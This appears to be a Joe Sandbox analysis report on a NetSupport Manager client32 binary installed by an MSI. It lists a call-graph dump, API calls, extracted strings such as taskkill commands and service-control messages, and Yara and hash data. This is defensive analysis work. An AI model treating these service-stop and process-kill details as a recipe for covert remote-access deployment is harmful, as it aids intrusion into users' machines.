55782 b2ee7b 55777->55782 55779 b2ee42 55901 b38c09 102 API calls 4 library calls 55779->55901 55902 b24420 219 API calls _wcsupr_s_l_stat 55781->55902 55784 b382b3 _wcsupr_s_l_stat 5 API calls 55782->55784 55785 b2ee8d 55784->55785 55785->55618 55989 b3cae1 55786->55989 55788 b3cc32 55788->55619 55789->55592 55790->55596 55795->55622 55796->55631 55797->55636 55798->55638 55799->55649 55800->55632 55801->55668 55802->55675 55803->55683 55804->55679 55805->55679 55806->55689 55808 b48267 EncodePointer 55807->55808 55808->55808 55809 b48281 55808->55809 55809->55693 55813 b39c5b 76 API calls 3 library calls 55810->55813 55812 b39ca4 55812->55695 55813->55812 55815 b00014 55814->55815 55816 afff53 GetModuleHandleW GetProcAddress 55814->55816 55815->55709 55817 afff7f GetCurrentProcessId 55816->55817 55818 afff9a GetCurrentProcessId OpenProcess 55816->55818 55820 afff88 55817->55820 55819 afffb7 OpenProcessToken 55818->55819 55822 afffe7 55818->55822 55821 afffc8 55819->55821 55819->55822 55820->55818 55823 afff8c 55820->55823 55821->55822 55824 afffcf GetTokenInformation 55821->55824 55825 b00003 CloseHandle 55822->55825 55826 b00006 55822->55826 55823->55709 55824->55822 55825->55826 55827 b0000a CloseHandle 55826->55827 55828 b0000d 55826->55828 55827->55828 55828->55815 55830 b254d8 GetProcAddress 55829->55830 55831 b255b1 55829->55831 55830->55831 55832 b254f1 GetProcAddress 55830->55832 55833 b382b3 _wcsupr_s_l_stat 5 API calls 55831->55833 55832->55831 55834 b25507 GetUserNameW 55832->55834 55835 b255be 55833->55835 55838 b25541 55834->55838 55835->55713 55836 b25580 55837 b255aa FreeLibrary 55836->55837 55837->55831 55838->55836 55838->55837 55839 b25582 55838->55839 55841 b2f030 208 API calls 55838->55841 55903 b00c30 187 API calls std::locale::facet::_Facet_Register 55839->55903 55841->55838 55843 b39cbf _wcslen 55842->55843 55846 b39cbb 55842->55846 55904 b3b552 66 API calls 2 library calls 55843->55904 55845 b39cd4 55845->55846 55905 b3847c 66 API calls 
__commit 55845->55905 55846->55715 55848 b39ce7 55848->55846 55849 b39cf2 55848->55849 55906 b3d649 10 API calls __call_reportfault 55849->55906 55907 b26e10 55851->55907 55853 b2a5be wsprintfW 55853->55720 55855 b39125 55854->55855 55856 b3918e 55854->55856 55861 b2df86 55855->55861 55946 b3cfc7 66 API calls __getptd_noexit 55855->55946 55948 b39013 78 API calls 3 library calls 55856->55948 55859 b39131 55947 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55859->55947 55861->55728 55871 b2f718 LoadLibraryW 55862->55871 55864 b2f7f3 55868 b2f7fb GetModuleHandleW GetProcAddress 55864->55868 55869 b2f865 55864->55869 55865 b2f7b8 GetProcAddress 55866 b2f7c6 GetCurrentProcess 55865->55866 55867 b2f7ea FreeLibrary 55865->55867 55874 b2f7d4 55866->55874 55867->55864 55872 b2f812 GetNativeSystemInfo 55868->55872 55873 b2f828 55868->55873 55870 b382b3 _wcsupr_s_l_stat 5 API calls 55869->55870 55875 b2f875 55870->55875 55871->55864 55871->55865 55872->55873 55876 b2f839 55872->55876 55877 b2f030 208 API calls 55873->55877 55874->55867 55879 b2f030 208 API calls 55874->55879 55875->55733 55878 b2f030 208 API calls 55876->55878 55877->55869 55880 b2f847 55878->55880 55882 b2f7e7 55879->55882 55881 b382b3 _wcsupr_s_l_stat 5 API calls 55880->55881 55883 b2f857 55881->55883 55882->55867 55883->55733 55885 b3d0b6 55884->55885 55886 b3d0ae GetLastError 55884->55886 55887 b3d0c8 55885->55887 55949 b3cfed 66 API calls 2 library calls 55885->55949 55886->55885 55887->55747 55889 b3d0c2 55889->55747 55893 b2b20c 55890->55893 55895 b2b244 55890->55895 55891 b382b3 _wcsupr_s_l_stat 5 API calls 55892 b2b264 55891->55892 55892->55749 55950 b29ef0 55893->55950 55895->55891 55896->55749 55897->55763 55898->55751 55899->55751 55900->55779 55901->55772 55902->55774 55903->55836 55904->55845 55905->55848 55906->55846 55908 b26e32 55907->55908 55909 b27602 55907->55909 55910 b26f1f GetModuleFileNameW 55908->55910 55917 b26e67 std::locale::facet::_Facet_Register 55908->55917 55911 
b276af 55909->55911 55912 b2769c 55909->55912 55910->55917 55914 b382b3 _wcsupr_s_l_stat 5 API calls 55911->55914 55913 b382b3 _wcsupr_s_l_stat 5 API calls 55912->55913 55915 b276ab 55913->55915 55916 b276c0 55914->55916 55915->55853 55916->55853 55918 b39583 std::locale::facet::_Facet_Register 136 API calls 55917->55918 55919 b26f71 55918->55919 55919->55909 55937 b22110 118 API calls 4 library calls 55919->55937 55921 b26f98 55938 b21e20 82 API calls 3 library calls 55921->55938 55923 b26fc0 55934 b2750d 55923->55934 55939 b383d7 67 API calls __fassign 55923->55939 55926 b26fd4 55926->55934 55940 b26c20 68 API calls 4 library calls 55926->55940 55928 b27002 55941 b21e20 82 API calls 3 library calls 55928->55941 55930 b27015 55930->55934 55942 b21e20 82 API calls 3 library calls 55930->55942 55932 b27044 _wcschr 55932->55934 55936 b39116 78 API calls __wcsicoll 55932->55936 55943 b26c20 68 API calls 4 library calls 55932->55943 55944 b21e20 82 API calls 3 library calls 55932->55944 55945 b38c09 102 API calls 4 library calls 55934->55945 55936->55932 55937->55921 55938->55923 55939->55926 55940->55928 55941->55930 55942->55932 55943->55932 55944->55932 55945->55909 55946->55859 55947->55861 55948->55861 55949->55889 55951 b29f31 _memset 55950->55951 55952 b39583 std::locale::facet::_Facet_Register 136 API calls 55951->55952 55953 b29f95 55952->55953 55954 b29fa2 55953->55954 55955 b29fb8 55953->55955 55957 b382b3 _wcsupr_s_l_stat 5 API calls 55954->55957 55980 b22110 118 API calls 4 library calls 55955->55980 55958 b29fb4 55957->55958 55958->55895 55959 b29fc5 55981 b21e20 82 API calls 3 library calls 55959->55981 55961 b2a000 55973 b2a0f6 55961->55973 55982 b383d7 67 API calls __fassign 55961->55982 55964 b2a27b 55965 b382b3 _wcsupr_s_l_stat 5 API calls 55964->55965 55966 b2a28d 55965->55966 55966->55895 55967 b2a014 55967->55973 55983 b26c20 68 API calls 4 library calls 55967->55983 55969 b2a0db 55984 b21e20 82 API calls 3 library calls 55969->55984 55971 b2a0ee 
55971->55973 55985 b21e20 82 API calls 3 library calls 55971->55985 55988 b38c09 102 API calls 4 library calls 55973->55988 55975 b2a12b _memset _wcschr _memmove 55975->55973 55977 b22000 WideCharToMultiByte 55975->55977 55978 b27710 67 API calls 55975->55978 55979 b38406 67 API calls 55975->55979 55986 b26c20 68 API calls 4 library calls 55975->55986 55987 b21e20 82 API calls 3 library calls 55975->55987 55977->55975 55978->55975 55979->55975 55980->55959 55981->55961 55982->55967 55983->55969 55984->55971 55985->55975 55986->55975 55987->55975 55988->55964 55990 b3caed __commit 55989->55990 55991 b492ea __lock 61 API calls 55990->55991 55992 b3caf4 55991->55992 55994 b3cb1f DecodePointer 55992->55994 55998 b3cb9e 55992->55998 55996 b3cb36 DecodePointer 55994->55996 55994->55998 56003 b3cb49 55996->56003 56010 b3cc0c 55998->56010 55999 b3cc03 56002 b3c94c _fast_error_exit 3 API calls 55999->56002 56001 b3cc1b __commit 56001->55788 56004 b3cc0c 56002->56004 56003->55998 56006 b3cb60 DecodePointer 56003->56006 56009 b3cb6f DecodePointer DecodePointer 56003->56009 56015 b4299e EncodePointer 56003->56015 56005 b3cc19 56004->56005 56017 b491f9 LeaveCriticalSection 56004->56017 56005->55788 56016 b4299e EncodePointer 56006->56016 56009->56003 56011 b3cc12 56010->56011 56012 b3cbec 56010->56012 56018 b491f9 LeaveCriticalSection 56011->56018 56012->56001 56014 b491f9 LeaveCriticalSection 56012->56014 56014->55999 56015->56003 56016->56003 56017->56005 56018->56012 56019 b67f20 56020 b097d0 std::locale::facet::_Facet_Register 188 API calls 56019->56020 56021 b67f2d 56020->56021 56022 b67f34 56021->56022 56023 b67f70 56021->56023 56025 b39c97 __cinit 76 API calls 56022->56025 56032 b385a6 56023->56032 56027 b67f69 56025->56027 56029 b67f98 LoadLibraryW 56030 b39c97 __cinit 76 API calls 56029->56030 56031 b67fe4 56030->56031 56038 b38548 56032->56038 56035 b391a1 56036 b391d6 RaiseException 56035->56036 56037 b391ca 56035->56037 56036->56029 56037->56036 56039 b3857b 
56038->56039 56040 b38556 _strlen 56038->56040 56039->56035 56041 b37ca4 _malloc 66 API calls 56040->56041 56042 b38568 56041->56042 56042->56039 56044 b40a68 66 API calls __commit 56042->56044 56044->56039 56045 b2ea6c 56050 b29630 OpenSCManagerW 56045->56050 56048 b382b3 _wcsupr_s_l_stat 5 API calls 56049 b2ef34 56048->56049 56051 b2968f 56050->56051 56052 b2f030 208 API calls 56051->56052 56053 b296b2 GetLastError 56052->56053 56054 b2f030 208 API calls 56053->56054 56055 b296c9 56054->56055 56108 b29df1 56055->56108 56198 b26700 56055->56198 56056 b2f030 208 API calls 56058 b29dfe 56056->56058 56060 b382b3 _wcsupr_s_l_stat 5 API calls 56058->56060 56062 b29e19 56060->56062 56061 b2f030 208 API calls 56063 b296f3 56061->56063 56062->56048 56064 b29d2e 56063->56064 56065 b296fe QueryServiceStatus 56063->56065 56066 b2f030 208 API calls 56064->56066 56067 b2f030 208 API calls 56065->56067 56068 b29d38 CloseServiceHandle Sleep 56066->56068 56069 b2971f 56067->56069 56070 b29d5a 56068->56070 56068->56108 56071 b2f030 208 API calls 56069->56071 56072 b29b1b 56069->56072 56074 b2f030 208 API calls 56070->56074 56070->56108 56073 b2973c 56071->56073 56077 b29d11 56072->56077 56078 b2f030 208 API calls 56072->56078 56075 b29b07 56073->56075 56076 b2974c 56073->56076 56079 b29d6c GetSystemDirectoryW 56074->56079 56080 b2f030 208 API calls 56075->56080 56081 b2f030 208 API calls 56076->56081 56083 b2f030 208 API calls 56077->56083 56082 b29b39 56078->56082 56094 b29d90 56079->56094 56080->56072 56085 b29756 56081->56085 56086 b29b41 QueryServiceStatus 56082->56086 56087 b29b96 56082->56087 56084 b29d1e CloseServiceHandle 56083->56084 56084->56064 56201 b16e30 56085->56201 56090 b29b54 56086->56090 56113 b29b94 56086->56113 56088 b29cfd 56087->56088 56087->56113 56097 b2f030 208 API calls 56088->56097 56093 b2f030 208 API calls 56090->56093 56091 b2f030 208 API calls 56095 b29bad StartServiceW 56091->56095 56107 b29b60 56093->56107 56098 b26700 149 API calls 56094->56098 
56100 b29bc3 56095->56100 56101 b29ce7 GetLastError 56095->56101 56097->56077 56099 b29dde 56098->56099 56221 b3cda8 66 API calls __commit 56099->56221 56104 b2f030 208 API calls 56100->56104 56105 b2f030 208 API calls 56101->56105 56109 b29bcf QueryServiceStatus 56104->56109 56110 b29cf8 56105->56110 56106 b29778 56205 ae3b70 236 API calls 56106->56205 56107->56087 56112 b29b75 Sleep QueryServiceStatus 56107->56112 56107->56113 56108->56056 56114 b29be7 56109->56114 56115 b29c0d 56109->56115 56110->56077 56112->56107 56112->56113 56113->56091 56117 b29c0f 56114->56117 56118 b29bec Sleep QueryServiceStatus 56114->56118 56119 b2f030 208 API calls 56115->56119 56116 b29793 56120 b2f030 208 API calls 56116->56120 56117->56115 56121 b29ce0 56117->56121 56118->56114 56118->56115 56122 b29c22 56119->56122 56123 b297a0 56120->56123 56121->56088 56220 ae95b0 12 API calls 56122->56220 56125 b299d7 56123->56125 56127 b16e30 149 API calls 56123->56127 56128 b16e30 149 API calls 56125->56128 56126 b29c34 56126->56077 56131 b29c46 RegisterEventSourceW 56126->56131 56130 b297b0 56127->56130 56129 b299dc 56128->56129 56215 ae3c80 210 API calls 2 library calls 56129->56215 56206 ae3c80 210 API calls 2 library calls 56130->56206 56131->56077 56133 b29c5d GetComputerNameW 56131->56133 56136 b29c85 56133->56136 56137 b29c8a wsprintfW ReportEventW DeregisterEventSource 56133->56137 56135 b299f6 56216 ae3b70 236 API calls 56135->56216 56136->56137 56137->56077 56138 b297ca 56207 ae3b70 236 API calls 56138->56207 56141 b29a0e 56143 b2f030 208 API calls 56141->56143 56142 b297e2 56144 b2f030 208 API calls 56142->56144 56145 b29a19 56143->56145 56146 b297ef 56144->56146 56217 ae3b70 236 API calls 56145->56217 56148 b299c2 56146->56148 56150 b16e30 149 API calls 56146->56150 56214 ae3da0 70 API calls 2 library calls 56148->56214 56149 b29a30 56152 b2f030 208 API calls 56149->56152 56153 b297ff 56150->56153 56154 b29a3b ControlService 56152->56154 56208 ae3c80 210 API calls 2 library calls 
56153->56208 56155 b29a52 QueryServiceStatus 56154->56155 56156 b29ac5 GetLastError 56154->56156 56160 b29a69 56155->56160 56161 b29a96 56155->56161 56159 b2f030 208 API calls 56156->56159 56158 b29819 56209 ae3b70 236 API calls 56158->56209 56164 b29ad6 Sleep 56159->56164 56165 b29a75 Sleep QueryServiceStatus 56160->56165 56166 b29a98 56160->56166 56163 b2f030 208 API calls 56161->56163 56168 b29aa7 56163->56168 56164->56168 56165->56160 56165->56161 56166->56161 56169 b29ab6 56166->56169 56167 b29831 56170 b2f030 208 API calls 56167->56170 56218 ae3da0 70 API calls 2 library calls 56168->56218 56173 b2f030 208 API calls 56169->56173 56172 b2983e 56170->56172 56175 b299b0 56172->56175 56178 b097d0 std::locale::facet::_Facet_Register 188 API calls 56172->56178 56173->56168 56174 b29af3 56219 ae3da0 70 API calls 2 library calls 56174->56219 56213 ae3da0 70 API calls 2 library calls 56175->56213 56177 b29b05 56177->56072 56180 b29853 56178->56180 56181 b29870 56180->56181 56210 afcf10 21 API calls 56180->56210 56211 afd710 236 API calls 56181->56211 56184 b2988a 56185 b2f030 208 API calls 56184->56185 56186 b29897 56185->56186 56188 b298a5 ctype 56186->56188 56212 afc620 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 56186->56212 56188->56175 56189 afff40 std::locale::facet::_Facet_Register 9 API calls 56188->56189 56190 b298bb _memset 56189->56190 56190->56175 56191 b298d2 GetSystemDirectoryW 56190->56191 56192 b16e30 149 API calls 56191->56192 56193 b298f6 56192->56193 56194 b2f030 208 API calls 56193->56194 56195 b29949 CreateProcessW 56194->56195 56195->56175 56196 b2997c WaitForSingleObject CloseHandle CloseHandle 56195->56196 56197 b2f030 208 API calls 56196->56197 56197->56175 56199 b16e30 149 API calls 56198->56199 56200 b26705 OpenServiceW GetLastError 56199->56200 56200->56061 56202 b2a5b0 149 API calls 56201->56202 56203 b16e3d 56202->56203 56204 ae3c80 210 API calls 2 library calls 56203->56204 56204->56106 56205->56116 56206->56138 
56207->56142 56208->56158 56209->56167 56210->56181 56211->56184 56213->56148 56214->56125 56215->56135 56216->56141 56217->56149 56218->56174 56219->56177 56220->56126 56221->56108

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B2967A
                                                                                                                        • GetLastError.KERNEL32 ref: 00B296BB
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 00B296DD
                                                                                                                        • GetLastError.KERNEL32 ref: 00B296E5
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2970C
                                                                                                                        • _memset.LIBCMT ref: 00B298CD
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000208), ref: 00B298EB
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00B29972
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 00B29988
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastOpenService$CreateDirectoryManagerObjectProcessQuerySingleStatusSystemWait_memset
                                                                                                                        • String ID: AllowStop (admin) ret %x$AllowStop (direct vista) ret %x$AllowStop (service vista) ret %x$AllowStop (service) ret %x$AllowStop ret %x$Attempt to start the service$Attempt to stop the service$CICWClass$Calling %s$Client32 (%s)$ControlService failed with %d$D$Global\CICWClass$Global\CICWClassAdmin$Global\CICWClassVista$Global\NSMWClass$Global\NSMWClassAdmin$Global\NSMWClassVista$NSMWClass$NSMWClassVista$PCIapp$RESTART$Restarted client32 service after %s$START$STOP$Service Manager : %08x - %d$Service State : %d$Service failed to start after 60 seconds$Service failed to stop after 60 seconds$Service is running$Service is stopped$Service isn't in Stopped state$Service isn't running$Service started ok$Service stopped ok$StartService failed with %d$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM cicStudent.exe /IM cicplugin.exe /IM cicplugin64.exe$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$hClient %08x - %d$restart$start$stop
                                                                                                                        • API String ID: 3819898530-63559561
                                                                                                                        • Opcode ID: 2865675dbbbe83f4be84873337d1274c986d581d12a35db96bd80b3b2494226d
                                                                                                                        • Instruction ID: a81a08dce24e80357038da9a83385cd68f15b6b0d3638e00171fafad51e2d76c
                                                                                                                        • Opcode Fuzzy Hash: 2865675dbbbe83f4be84873337d1274c986d581d12a35db96bd80b3b2494226d
                                                                                                                        • Instruction Fuzzy Hash: 2B12D871D41325ABEB20AB54AC46FAA72F8EB40B54F0440E4F90DA72C2DB709F45CB66

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00B14790
                                                                                                                        • LoadLibraryW.KERNELBASE(?,?), ref: 00B147D8
                                                                                                                        • LoadLibraryW.KERNELBASE(DBGHELP.DLL,?,?), ref: 00B147E9
                                                                                                                        • LoadLibraryW.KERNEL32(IMAGEHLP.DLL,?,?), ref: 00B147F8
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00B147FE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 00B14812
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 00B14831
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 00B1483C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 00B14847
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 00B14852
                                                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 00B1485D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 00B14868
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 00B14873
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 00B1487E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymRefreshModuleList), ref: 00B14889
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 00B14894
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 00B1489F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 00B148AA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 00B148B5
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 00B148C0
                                                                                                                        • GetProcAddress.KERNELBASE(00000000,MiniDumpWriteDump), ref: 00B148CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymRefreshModuleList$SymSetOptions$dbghelp.dll
                                                                                                                        • API String ID: 1621119295-2166784381
                                                                                                                        • Opcode ID: b8f6d54e766f2947e8f639f472c92e15081e1727dfc875c8e39baeb85367f3fe
                                                                                                                        • Instruction ID: 493ac02c0661ed372f8b092c49eb2c312b076a3cdf94ed5fbe9bfe261159a594
                                                                                                                        • Opcode Fuzzy Hash: b8f6d54e766f2947e8f639f472c92e15081e1727dfc875c8e39baeb85367f3fe
                                                                                                                        • Instruction Fuzzy Hash: 99416070900705AFD7209F769C8593BFAF8FF95B0470009BEE446D36A1EBB8EC018A58

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                        • wsprintfW.USER32 ref: 00B2F09D
                                                                                                                        • wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                        • wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                        • _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • InitializeCriticalSection.KERNEL32(00B9250C), ref: 00B2F1A6
                                                                                                                        • EnterCriticalSection.KERNEL32(00B9250C), ref: 00B2F1BB
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B2F1F5
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B2F2DF
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B2F33D
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00B2F346
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSectionStatewsprintf$AllocateCurrentDirectoryEnterHeapInitializeLocalTime__wcsnicmp_mallocwvsprintf
                                                                                                                        • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d $@$C:\Windows\Installer\$C:\Windows\Installer\$Log$Log=$SOFTWARE\Productive Computer Insight\%s$a+t$a+tc$winst32$winst32.log$winstall
                                                                                                                        • API String ID: 146506923-2290212741
                                                                                                                        • Opcode ID: 4f2c363d05514b4b2e1ec2802fd01808b7dd721d6cf7c582b34eeab5b83ccebe
                                                                                                                        • Instruction ID: 1ea587d02cdb87501f1483912687b4b8e0f20018cae32eabddf537df7d70c8f8
                                                                                                                        • Opcode Fuzzy Hash: 4f2c363d05514b4b2e1ec2802fd01808b7dd721d6cf7c582b34eeab5b83ccebe
                                                                                                                        • Instruction Fuzzy Hash: A3E106B1900216ABCB20EF64EC91BFA73F4EB54304F4441F9F90DA7291EBB45A84CB91

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0003A490,00000000,00000000,00000000), ref: 00B2DE15
                                                                                                                        • GetModuleFileNameW.KERNEL32(00AE0000,?,00000100), ref: 00B2DE34
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2DE3A
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000050), ref: 00B2DE89
                                                                                                                        • __wcsdup.LIBCMT ref: 00B2DEC6
                                                                                                                        • LoadStringW.USER32(?,000003E8,?,00000100), ref: 00B2DF37
                                                                                                                        • wsprintfW.USER32 ref: 00B2DF51
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B2DF81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$ErrorExceptionFileFilterLastLoadModuleStringUnhandledUser__wcsdup__wcsicollwsprintf
                                                                                                                        • String ID: $/EC$/ec$Command Line: %s$NSM$NetSupport Manager for Windows (32 bit) V14.10$P$PCD$Start, session=%d, user=%s$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                                                        • API String ID: 4293451977-2907401125
                                                                                                                        • Opcode ID: 277d5430cb6cbbaa965476c617cf3350cba1a4b202846fd498d9eeee75d27578
                                                                                                                        • Instruction ID: 7d037855b65fd186393a39df6943f04cc8e542553c78eda3d82c4f0eb00827e3
                                                                                                                        • Opcode Fuzzy Hash: 277d5430cb6cbbaa965476c617cf3350cba1a4b202846fd498d9eeee75d27578
                                                                                                                        • Instruction Fuzzy Hash: 6EB115B19403129FCB20BF69ED46A6A73F4FB14700F1585E5F52D972A1EFB09980CB62

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B1A299
                                                                                                                        • _wcschr.LIBCMT ref: 00B1A2CF
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00B1A2E0
                                                                                                                        • wsprintfW.USER32 ref: 00B1A2F4
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 00B1A310
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A31A
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00B1A32F
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00B1A340
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00B1A34D
                                                                                                                        • wsprintfW.USER32 ref: 00B1A37F
                                                                                                                        • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 00B1A39A
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A3A5
                                                                                                                        • CloseHandle.KERNEL32(000001F8), ref: 00B1A3B9
                                                                                                                        • wsprintfW.USER32 ref: 00B1A3E9
                                                                                                                        • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 00B1A404
                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B1A412
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B1A420
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B1A42F
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B1A43E
                                                                                                                        • CreateThread.KERNELBASE(00000000,00002000,Function_00035A70,00000000,00000000,?), ref: 00B1A45C
